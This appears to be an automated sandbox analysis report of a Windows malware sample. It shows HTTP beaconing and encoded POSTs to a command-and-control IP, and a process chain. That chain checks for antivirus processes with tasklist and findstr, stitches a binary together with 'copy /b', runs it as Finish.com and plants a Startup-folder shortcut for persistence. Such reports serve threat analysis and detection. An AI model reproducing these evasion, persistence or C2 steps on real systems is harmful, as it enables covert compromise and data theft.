                                      Nov 24, 2024 12:07:32.489780903 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:32 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      106192.168.2.550084178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:32.689677000 CET176OUTGET /v10/ukyh.php?jspo=3002&melq=79019141f392e1d4f8c60697fd9f5a0e*2&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:34.084306955 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:33 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 74 72 75 65
                                      Data Ascii: true


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      107192.168.2.550085178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:33.006464005 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:34.308212042 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:34 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      108192.168.2.550086178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:34.304775953 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:35.673651934 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:35 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      109192.168.2.550087178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:34.500812054 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:35.774267912 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:35 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      110192.168.2.550088178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:35.854590893 CET136OUTGET /v10/ukyh.php?jspo=2022&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:37.161428928 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:36 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      111192.168.2.550089178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:36.242769957 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:37.503277063 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:37 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      112192.168.2.550090178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:37.449019909 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:38.762264967 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:38 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      113192.168.2.550091178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:38.264523029 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:39.572587013 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:39 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      114192.168.2.550092178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:38.903289080 CET661OUTPOST /v10/ukyh.php HTTP/1.1
                                      Accept: text/*
                                      Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                      User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                      Host: 178.215.224.74
                                      Content-Length: 367
                                      Cache-Control: no-cache
                                      Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 49 33 4b 44 6b 79 4d 69 70 4c 4f 46 35 64 63 32 64 77 63 56 35 6a 62 6d 5a 74 5a 6e 74 65 51 33 42 79 52 47 46 30 59 56 78 53 62 57 6c 76 61 57 35 6e 58 6b 5a 76 62 48 4a 6f 61 57 35 47 64 57 56 77 63 56 34 30 51 30 4d 35 4e 44 51 78 4d 54 64 42 51 55 4d 33 4d 45 51 38 51 45 56 47 4f 45 52 48 4f 7a 49 77 52 30 5a 48 4e 6a 52 66 5a 47 34 6d 4e 58 68 62 51 6c 30 78 4d 44 41 71 4d 54 49 34 4d 7a 45 71 4d 54 55 36 4c 6a 49 7a 4e 53 34 79 4d 44 51 6d 4e 7a 5a 5a 51 46 30 7a 4d 6a 41 6f 4d 7a 41 77 4b 45 45 36 58 46 56 78 62 58 42 7a 58 47 6c 75 5a 47 64 75 63 56 35 44 63 6e 4a 47 59 58 5a 70 56 46 42 74 59 57 39 70 62 6d 64 63 52 47 39 75 65 47 70 70 62 6b 52 33 62 33 42 7a 58 6a 52 44 51 54 73 32 50 6a 4d 7a 4e 30 4e 44 51 54 63 79 52 44 5a 43 52 30 51 79 52 6b 55 7a 4d 44 70 48 52 45 55 38 4e 43 78 34 62 6d 56 5a 51 6c 38 7a 4d 6a 41 6f 4f 54 67 79 4d [TRUNCATED]
                                      Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTI3KDkyMipLOF5dc2dwcV5jbmZtZnteQ3ByRGF0YVxSbWlvaW5nXkZvbHJoaW5GdWVwcV40Q0M5NDQxMTdBQUM3MEQ8QEVGOERHOzIwR0ZHNjRfZG4mNXhbQl0xMDAqMTI4MzEqMTU6LjIzNS4yMDQmNzZZQF0zMjAoMzAwKEE6XFVxbXBzXGluZGducV5DcnJGYXZpVFBtYW9pbmdcRG9ueGppbkR3b3BzXjRDQTs2PjMzN0NDQTcyRDZCR0QyRkUzMDpHREU8NCx4bmVZQl8zMjAoOTgyMzEoMTc4LjIxNyYwMjQuNTZbQF8%3D
                                      Nov 24, 2024 12:07:40.264004946 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:40 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      115192.168.2.550093178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:40.080641985 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:41.395768881 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:41 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      116192.168.2.550094178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:41.603795052 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:42.956691027 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:42 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      117192.168.2.550095178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:43.143423080 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:44.452377081 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:44 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      118192.168.2.550096178.215.224.74805544C:\Users\user\AppData\Local\Temp\768032\Finish.com
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:44.616657019 CET405OUTPOST /v10/ukyh.php HTTP/1.1
                                      Accept: text/*
                                      Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                      User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                      Host: 178.215.224.74
                                      Content-Length: 111
                                      Cache-Control: no-cache
                                      Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 7a 4b 44 6b 79 4d 6a 45 25 32 46 4b 46 6c 49 58 54 4d 79 4d 69 67 7a 4d 6a 41 7a 4f 53 49 7a 4e 54 67 73 4d 6a 45 31 4c 6a 49 79 4e 69 59 31 4e 46 74 41 58 77 25 33 44 25 33 44
                                      Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAzKDkyMjE%2FKFlIXTMyMigzMjAzOSIzNTgsMjE1LjIyNiY1NFtAXw%3D%3D
                                      Nov 24, 2024 12:07:45.934109926 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:45 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      119192.168.2.550097178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:46.440603018 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:47.755523920 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:47 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      120192.168.2.550098178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:47.944969893 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:49.258510113 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:49 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      121192.168.2.550099178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:49.474704981 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:50.828705072 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:50 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      122192.168.2.550100178.215.224.74805544C:\Users\user\AppData\Local\Temp\768032\Finish.com
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:50.960824013 CET405OUTPOST /v10/ukyh.php HTTP/1.1
                                      Accept: text/*
                                      Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                      User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                      Host: 178.215.224.74
                                      Content-Length: 111
                                      Cache-Control: no-cache
                                      Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 7a 4b 44 6b 79 4d 6a 45 25 32 46 4b 46 6c 49 58 54 4d 79 4d 69 67 7a 4d 6a 41 7a 4f 53 49 7a 4e 54 67 73 4d 6a 45 31 4c 6a 49 79 4e 69 59 31 4e 46 74 41 58 77 25 33 44 25 33 44
                                      Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAzKDkyMjE%2FKFlIXTMyMigzMjAzOSIzNTgsMjE1LjIyNiY1NFtAXw%3D%3D
                                      Nov 24, 2024 12:07:52.320950985 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:52 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      123192.168.2.550101178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:52.804640055 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:54.155518055 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:53 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      124192.168.2.550102178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:54.339731932 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:55.645973921 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:55 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      125192.168.2.550103178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:55.850605965 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:57.150598049 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:56 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      126192.168.2.550104178.215.224.74805544C:\Users\user\AppData\Local\Temp\768032\Finish.com
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:57.317951918 CET405OUTPOST /v10/ukyh.php HTTP/1.1
                                      Accept: text/*
                                      Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                      User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                      Host: 178.215.224.74
                                      Content-Length: 111
                                      Cache-Control: no-cache
                                      Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 7a 4b 44 6b 79 4d 6a 45 25 32 46 4b 46 6c 49 58 54 4d 79 4d 69 67 7a 4d 6a 41 7a 4f 53 49 7a 4e 54 67 73 4d 6a 45 31 4c 6a 49 79 4e 69 59 31 4e 46 74 41 58 77 25 33 44 25 33 44
                                      Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAzKDkyMjE%2FKFlIXTMyMigzMjAzOSIzNTgsMjE1LjIyNiY1NFtAXw%3D%3D
                                      Nov 24, 2024 12:07:58.648082972 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:58 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      127192.168.2.550105178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:08:00.892553091 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:08:02.229844093 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:08:01 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      128192.168.2.550106178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:08:02.420949936 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:08:03.778614998 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:08:03 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      129192.168.2.550107178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:08:03.956661940 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:08:05.314522028 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:08:05 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:06:03:54
                                      Start date:24/11/2024
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                      Imagebase:0x400000
                                      File size:1'245'183 bytes
                                      MD5 hash:C938C02A19091A3ACD044001631692C8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:06:03:55
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:06:03:55
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:06:03:57
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                      Wow64 process (32bit):true
                                      Commandline:tasklist
                                      Imagebase:0x2e0000
                                      File size:79'360 bytes
                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:06:03:57
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr /I "wrsa opssvc"
                                      Imagebase:0xb80000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:06:03:58
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                      Wow64 process (32bit):true
                                      Commandline:tasklist
                                      Imagebase:0x2e0000
                                      File size:79'360 bytes
                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:06:03:58
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                      Imagebase:0xb80000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:06:03:58
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c md 768032
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:06:03:58
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c copy /b ..\Howard + ..\Los + ..\Become + ..\Mental + ..\Vermont + ..\Bt + ..\Vatican G
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:06:03:58
                                      Start date:24/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\768032\Finish.com
                                      Wow64 process (32bit):true
                                      Commandline:Finish.com G
                                      Imagebase:0x550000
                                      File size:947'288 bytes
                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:moderate
                                      Has exited:false

                                      Target ID:11
                                      Start time:06:03:59
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\choice.exe
                                      Wow64 process (32bit):true
                                      Commandline:choice /d y /t 5
                                      Imagebase:0x680000
                                      File size:28'160 bytes
                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:12
                                      Start time:06:03:59
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & echo URL="C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & exit
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:false
                                      Has administrator privileges:false
